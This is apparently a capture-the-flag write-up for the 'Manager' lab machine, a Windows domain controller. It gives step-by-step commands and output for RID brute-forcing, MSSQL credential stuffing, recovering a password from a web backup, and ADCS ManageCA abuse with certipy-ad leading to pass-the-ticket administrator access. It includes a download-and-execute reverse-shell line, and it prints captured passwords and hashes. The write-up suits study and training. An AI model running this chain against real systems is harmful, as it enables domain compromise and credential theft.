Week 4. Manager
TL;DR
This is a Windows 2019 server machine configured as domain controller running a MSSQL database. Using enabled guest sessions on SMB shared resource, we can bruteforce the RID and get a list of domain users, then bruteforce credentials for the MSSQL database. In the database, the xp_dirtree stored procedure is used to locate a backup of the database which contains credentials for a WinRM shell. Regarding escalation, a misconfiguration on the manage CA permissions can be abused with Certipy-AD to create a new certificate for an administrator user.
KEYWORDS
RID bruteforce, MSSQL directory traversal, xp_dirtree, manageCA, certipy-ad, pass the certificate, pass the ticket.
REFERENCES
https://www.thehacker.recipes/a-d/movement/kerberos/pass-the-certificate
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 16:51 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up, received user-set (0.32s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
1433/tcp open ms-sql-s syn-ack
3268/tcp open ldap syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49677/tcp open unknown syn-ack
49678/tcp open unknown syn-ack
49679/tcp open unknown syn-ack
50489/tcp open unknown syn-ack
50568/tcp open unknown syn-ack
65495/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 1379.15 secondsEnumerate the open ports.
> nmap $target -p53,80,88,135,139,389,445,464,593,636,1433,3268,5985,9389 -sV -sC -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 17:29 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-22 04:33:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:12+00:00; +7h03m30s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-20T17:45:32
|_Not valid after: 2053-10-20T17:45:32
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h03m30s, deviation: 1s, median: 7h03m30s
| smb2-time:
| date: 2023-10-22T04:33:32
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 55.72 secondsSMB enumeration.
> smbmap -H <target ip> -u guest
[+] IP: 10.129.142.151:445 Name: manager.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server shareThe SMB share allows guest sessions; however, there are no shared folders available.
USER
Try an RID bruteforce.
> crackmapexec smb manager.htb -u guest -p '' --rid-brute
SMB 10.129.142.151 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.142.151 445 DC01 [+] manager.htb\guest:
SMB 10.129.142.151 445 DC01 [+] Brute forcing RIDs
SMB 10.129.142.151 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.142.151 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.142.151 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.142.151 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.142.151 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.142.151 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.142.151 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.142.151 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.142.151 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.142.151 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.151 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.142.151 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.142.151 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.142.151 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.142.151 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.142.151 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.142.151 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.142.151 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.142.151 445 DC01 1119: MANAGER\Operator (SidTypeUser)Copy domain users found to a file called output and generate a wordlist for users and passwords.
> echo "MANAGER\Zhong (SidTypeUser)
SMB 10.129.142.151 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.142.151 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.142.151 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.142.151 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.142.151 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.142.151 445 DC01 1119: MANAGER\Operator (SidTypeUser)" > output
> cat output | cut -d \\ -f 2 | awk -F ' ' {'print $1}' | tr '[:upper:]' '[:lower:]' > wordlist
> cat wordlist
zhong
cheng
ryan
raven
jinwoo
chinhae
operatorNext, attempt a credential stuffing attack in the MSSQL database using this wordlist.
> crackmapexec mssql manager.htb -u ./wordlist -p ./wordlistAttack is successful for credentials operator:operator
Log in with credentials and start enumerating the database.
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator:operator@10.129.142.151 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
> SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
> SQL> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.It seems xp_cmdshell is not enabled and we don't have permissions to activate, therefore this way is closed. We will try to capture the NTLMv2 hash with responder or smbserver.py + xp_dirtree
The captured hash is.
[*] DC01$::MANAGER:aaaaaaaaaaaaaaaa:d063ef67f8a1adf0d8368e4438f744db:0101000000000000809a7d8dbd04da01a9e4c3054b7505c100000000010010004200470051006400540074006800640003001000420047005100640054007400680064000200100050005a005800780059005600670041000400100050005a0058007800590056006700410007000800809a7d8dbd04da0106000400020000000800300030000000000000000000000000300000489aaa814b1c641c0613cb01649cab0b0c5aadd6d67823781f76634d0d773dec0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360039000000000000000000It is not crackable with Hashcat though.
Since we can at least explore the file system with xp_dirtree, let's list the contents of webroot folder.
> SQL> exec xp_dirtree 'c:\inetpub',1,1
subdirectory depth file
----------------------------------------------- --------------------- ----------- -----------
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
> SQL> exec xp_dirtree 'c:\inetpub\wwwroot',1,1
subdirectory depth file
---------------------------------------------------------------------- ----------- -----------
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1 It seems someone made a backup of the site on July and forgot a copy of the file in the webroot folder. This can be downloaded using a browser or wget
> wget http://manager.htb/website-backup-27-07-23-old.zip -O backup.zipInside the .zip file we find an .xml with credentials.
We use them to log in with evil-winrm
> evil-winrm -u raven -p 'R4v3nBe5tD3veloP3r!123' -i 10.129.142.151This shell allows us to collect the user flag.
SYSTEM
First step is to upgrade the shell to a nishang interactive shell.
> powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.69/Invoke-PowerShellTcp.ps1')"Next, enumerate the system.
> get-computerinfo
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsProductName : Windows Server 2019 Standard
WindowsVersion : 1809Enumerate principal rights with certify.exe
It seems user raven has privileges to manage the CA. A walkthrough to exploit this vulnerability can be found here: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#attack-2
First step is to grant yourself the Manage Certificates access right by adding your user as a new officer with certipy-ad tool.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.151 -add-officer raven
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'The SubCA template can be enabled on the CA with the -enable-template flag. By default, the SubCA template is enabled.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'No we request a certificate based on the SubCA template. This request will be denied, but we will save the private key and note down the request ID. Make sure you are running the command from a directory where you have writing rights, otherwise the .key will not be written.
> /usr/bin/certipy-ad req -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate# we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -issue-request 21 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
[*] Successfully issued certificateIn this case, private key is saved as 21.key. Next, retrieve the issued certificate with the req command and the -retrieve <request ID> flag.
> /usr/bin/certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 21
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'We can use this certificate to obtain a TGT ticket with certipy-ad. This is known as a pass-the-certificate attack (https://www.thehacker.recipes/a-d/movement/kerberos/pass-the-certificate).
In order for this to work, synchronization with DC clock is needed to avoid clock skew too great. This can be done with ntpdate
> sudo ntpdate -u 10.129.142.151
2023-10-22 16:28:37.84492 (-0400) +25184.364655 +/- 0.061746 10.129.142.151 s1 no-leap
CLOCK: time stepped by 25184.364655Now, using the administrator certificate that we have just created, we generate a Kerberos TGT ticket.
> /usr/bin/certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.129.142.151 -username administrator -domain manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efAt this point, you can have a full interactive system shell by either passing the administrator hash or passing the TGT ticket.
To pass the hash, you can use psexec or similar tool. To pass the ticket, first export the ticket to prepare the attack.
> export KRB5CCNAME=administrator.ccacheThen login into the DC passing the TGT ticket.
> python3 /usr/share/doc/python3-impacket/examples/psexec.py manager.htb/administrator@dc01 -k -no-pass -dc-ip 10.129.142.151 -target-ip 10.129.142.151
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.142.151.....
[*] Found writable share ADMIN$
[*] Uploading file pxXDoAzA.exe
[*] Opening SVCManager on 10.129.142.151.....
[*] Creating service CRFB on 10.129.142.151.....
[*] Starting service CRFB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 566E-8ECA
Directory of c:\Users\Administrator\Desktop
09/28/2023 02:27 PM <DIR> .
09/28/2023 02:27 PM <DIR> ..
10/20/2023 10:46 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,414,751,744 bytes freeFinal note: for some reason the DC clock gets unskewed very easily, for this reason the commands after the ntpdate have to be issued very quickly to avoid clocks get unsynchronized. Have them typed elsewhere to quickly copy-paste them.
Last updated